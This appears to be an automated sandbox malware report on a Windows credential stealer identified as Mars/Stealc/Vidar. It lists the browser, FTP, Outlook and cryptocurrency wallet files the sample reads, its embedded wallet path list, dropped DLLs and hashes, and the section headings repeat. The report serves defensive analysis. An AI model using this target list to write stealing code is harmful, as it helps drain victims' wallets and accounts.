Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: i3NmF0obCm.exe, 00000000.00000002.1859476233.0000000001381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\i3NmF0obCm.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: i3NmF0obCm.exe PID: 6304, type: MEMORYSTR

Remote Access Functionality

Yara detected Mars stealer

Source: Yara match	File source: i3NmF0obCm.exe, type: SAMPLE
Source: Yara match	File source: 0.2.i3NmF0obCm.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.i3NmF0obCm.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1660747391.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 00000000.00000002.1859476233.000000000131E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: i3NmF0obCm.exe PID: 6304, type: MEMORYSTR
Source: Yara match	File source: decrypted.binstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: i3NmF0obCm.exe, type: SAMPLE
Source: Yara match	File source: 0.2.i3NmF0obCm.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.i3NmF0obCm.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1660747391.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: i3NmF0obCm.exe PID: 6304, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C6C0C40 sqlite3_bind_zeroblob,	0_2_6C6C0C40
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C6C0D60 sqlite3_bind_parameter_name,	0_2_6C6C0D60
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5E8EA0 sqlite3_clear_bindings,	0_2_6C5E8EA0
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C6C0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	0_2_6C6C0B40
Source: C:\Users\user\Desktop\i3NmF0obCm.exe	Code function: 0_2_6C5E6410 bind,WSAGetLastError,	0_2_6C5E6410

ID:	1465851
Product:	CloudBasic
Start time:	07:30:08
Start date:	02.07.2024
Sample:	i3NmF0obCm.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	253ccac8a47b80287f651987c0c779ea
SHA1:	11db405849dbaa9b3759de921835df20fab35bc3
SHA256:	262a400b339deea5089433709ce559d23253e23d23c07595b515755114147e2f
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Windows Analysis Report
i3NmF0obCm.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\AEBKFIJEGCAAFHJKFCFCAAAAEG	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11	41EA9A4112F057AE6BA17E2838AEAC26	F2B389103BFD1A1A050C4857A995B09FEAFE8903	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
C:\ProgramData\AKFHDBFIDAECAAAKEGDA	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1	349E6EB110E34A08924D92F6B334801D	BDFB289DAFF51890CC71697B6322AA4B35EC9169	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
C:\ProgramData\DGCBKECAKFBGCAKECGIE	ASCII text, with very long lines (1809), with CRLF line terminators	5D8E5D85E880FB2D153275FCBE9DA6E5	72332A8A92B77A8B1E3AA00893D73FC2704B0D13	50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
C:\ProgramData\EGCGHCBK	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2	780853CDDEAEE8DE70F28A4B255A600B	AD7A5DA33F7AD12946153C497E990720B09005ED	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
C:\ProgramData\GCGDGHCB	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3	28591AA4E12D1C4FC761BE7C0A468622	BC4968A84C19377D05A8BB3F208FBFAC49F4820B	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
C:\ProgramData\GDGDHJJDGHCAAAKEHIJKEBAEGH	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3	369B6DD66F1CAD49D0952C40FEB9AD41	D05B2DE29433FB113EC4C558FF33087ED7481DD4	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
C:\ProgramData\GDHCGDGIEBKJKFHJJKFCBFBGDA	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2	C0FDF21AE11A6D1FA1201D502614B622	11724034A1CC915B061316A96E79E9DA6A00ADE8	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
C:\ProgramData\JJKJDAEBFCBKECBGDBFC	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1	28222628A3465C5F0D4B28F70F97F482	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
C:\ProgramData\freebl3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	550686C0EE48C386DFCB40199BD076AC	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
C:\ProgramData\mozglue.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	C8FD9BE83BC728CC04BEFFAFC2907FE9	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
C:\ProgramData\msvcp140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	5FF1FCA37C466D6723EC67BE93B51442	34CC4E158092083B13D67D6D2BC9E57B798A303B	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
C:\ProgramData\nss3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	1CC453CDF74F31E4D913FF9C10ACDDE2	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
C:\ProgramData\softokn3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	4E52D739C324DB8225BD9AB2695F262F	71C3DA43DC5A0D2A1941E874A6D015A071783889	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
C:\ProgramData\vcruntime140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	A37EE36B536409056A86F50E67777DD7	1CAFA159292AA736FC595FC04E16325B27CD6750	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	550686C0EE48C386DFCB40199BD076AC	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	C8FD9BE83BC728CC04BEFFAFC2907FE9	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	5FF1FCA37C466D6723EC67BE93B51442	34CC4E158092083B13D67D6D2BC9E57B798A303B	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	1CC453CDF74F31E4D913FF9C10ACDDE2	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	4E52D739C324DB8225BD9AB2695F262F	71C3DA43DC5A0D2A1941E874A6D015A071783889	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	A37EE36B536409056A86F50E67777DD7	1CAFA159292AA736FC595FC04E16325B27CD6750	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	data	B7C14EC6110FA820CA6B65F5AEC85911	608EEB7488042453C9CA40F7E1398FC1A270F3F4	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm	data	B7C14EC6110FA820CA6B65F5AEC85911	608EEB7488042453C9CA40F7E1398FC1A270F3F4	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB

Windows Analysis Report i3NmF0obCm.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report
i3NmF0obCm.exe

Malware Threat Intel
Provided by